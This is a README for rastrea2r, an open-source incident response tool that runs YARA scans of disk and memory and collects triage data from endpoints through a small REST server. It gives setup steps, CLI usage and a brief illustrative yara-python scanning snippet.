Ever wanted to turn your AV console into an Incident Response & Threat Hunting machine? Rastrea2r (pronounced "rastreador" - hunter - in Spanish) is a multi-platform open source tool that allows incident responders and SOC analysts to triage suspect systems and hunt for Indicators of Compromise (IOCs) across thousands of endpoints in minutes. To parse and collect artifacts of interest from remote systems (including memory dumps), rastrea2r can execute Sysinternals tools, system commands and other 3rd-party tools across multiple endpoints, saving the output to a centralized share for automated or manual analysis. By using a client/server RESTful API, rastrea2r can also hunt for IOCs on disk and memory across multiple systems using YARA rules. As a command line tool, rastrea2r can be easily integrated within McAfee ePO, as well as other AV consoles and orchestration tools, allowing incident responders and SOC analysts to collect forensic evidence and hunt for IOCs without the need for an additional agent, with 'gusto' and style!
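The YARA matching itself is handled by yara-python (listed under Dependencies below). Purely as an illustration of what a disk scan boils down to - this is not rastrea2r's client/server code - a minimal yara-python sweep looks like this:

import os
import yara

# Minimal illustration of a YARA scan over a directory tree - not rastrea2r's code.
# "test.yar" and "/opt" match the rule and path used in the quickstart example below.
rules = yara.compile(filepath="test.yar")

def scan_tree(root):
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            path = os.path.join(dirpath, filename)
            try:
                matches = rules.match(path)
            except yara.Error:
                continue
            if matches:
                print(path, "->", [m.rule for m in matches])

scan_tree("/opt")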


Dependencies
  • Python 2.7.x
  • git
  • bottle
  • requests
  • yara-python

Quickstart
  • Clone the project to your local directory (or download the zip file of the project)
$git clone https://github.com/rastrea2r/rastrea2r.git
$cd rastrea2r
  • All the dependencies necessary for the tool to run can be installed within a virtual environment via the provided makefile.
$make help
help - display this makefile's help information
venv - create a virtual environment for development
clean - clean all files using .gitignore rules
scrub - clean all files, even untracked files
test - run tests
test-verbose - run tests [verbosely]
check-coverage - perform test coverage checks
check-style - perform pep8 check
fix-style - perform check with autopep8 fixes
docs - generate project documentation
check-docs - quick check docs consistency
serve-docs - serve project html documentation
dist - create a wheel distribution package
dist-test - test a wheel distribution package
dist-upload - upload a wheel distribution package
  • Create a virtual environment with all dependencies
$make venv
//Upon successful creation of the virtual environment, activate it as instructed, for example:
$source /Users/ssbhat/.venvs/rastrea2r/bin/activate
  • Start the rastrea2r server by going to $PROJECT_HOME/src/rastrea2r/server folder
$cd src/rastrea2r/server/
$python rastrea2r_server_v0.3.py
Bottle v0.12.13 server starting up (using WSGIRefServer())...
Listening on http://0.0.0.0:8080/
  • Now execute the client program, choosing the target Python script for the platform you are scanning. Windows, Linux and Mac platforms are currently supported.
$python rastrea2r_osx_v0.3.py -h
usage: rastrea2r_osx_v0.3.py [-h] [-v] {yara-disk,yara-mem,triage} ...

Rastrea2r RESTful remote Yara/Triage tool for Incident Responders

positional arguments: {yara-disk,yara-mem,triage}

modes of operation
yara-disk Yara scan for file/directory objects on disk
yara-mem Yara scan for running processes in memory
triage Collect triage information from endpoint

optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit


Furthermore, the available options under each command can be viewed by executing the help option, i.e.

$python rastrea2r_osx_v0.3.py yara-disk -h
usage: rastrea2r_osx_v0.3.py yara-disk [-h] [-s] path server rule

positional arguments:
path File or directory path to scan
server rastrea2r REST server
rule Yara rule on REST server

optional arguments:
-h, --help show this help message and exit
-s, --silent Suppresses standard output
  • For example, on a Mac or Unix system you would do:
$cd src/rastrea2r/osx/

$python rastrea2r_osx_v0.3.py yara-disk /opt http://127.0.0.1:8080/ test.yar

Executing rastrea2r on Windows

Currently Supported functionality
  • yara-disk: Yara scan for file/directory objects on disk
  • yara-mem: Yara scan for running processes in memory
  • memdump: Acquires a memory dump from the endpoint ** Windows only
  • triage: Collects triage information from the endpoint ** Windows only

Notes
For memdump and triage modules, SMB shares must be set up in this specific way:
  • Binaries (Sysinternals tools, batch files and others) must be located in a shared folder called TOOLS (read only)
    \\path-to-share-folder\tools
  • Output is sent to a shared folder called DATA (write only)
    \\path-to-share-folder\data
  • For yara-mem and yara-disk scans, the yara rules must be in the same directory where the server is executed from.
  • The RESTful API server stores data received in a file called results.txt in the same directory (a minimal sketch of such a server follows this list).
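As a minimal sketch of what such a collection endpoint could look like - this is not rastrea2r's actual route layout or field names, just an illustration built on bottle, which the tool depends on:

from bottle import Bottle, request, run

app = Bottle()

# Illustrative only: append whatever the client posts to results.txt,
# mirroring the behaviour described in the note above.
@app.post("/results")
def save_results():
    payload = request.body.read().decode("utf-8", errors="replace")
    with open("results.txt", "a") as handle:
        handle.write(payload + "\n")
    return "ok"

run(app, host="0.0.0.0", port=8080)   # same bind address/port as the quickstart output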

Contributing to rastrea2r project
The Developer Documentation provides complete information on how to contribute to the rastrea2r project.

Demo videos on Youtube

Presentations

Credits & References

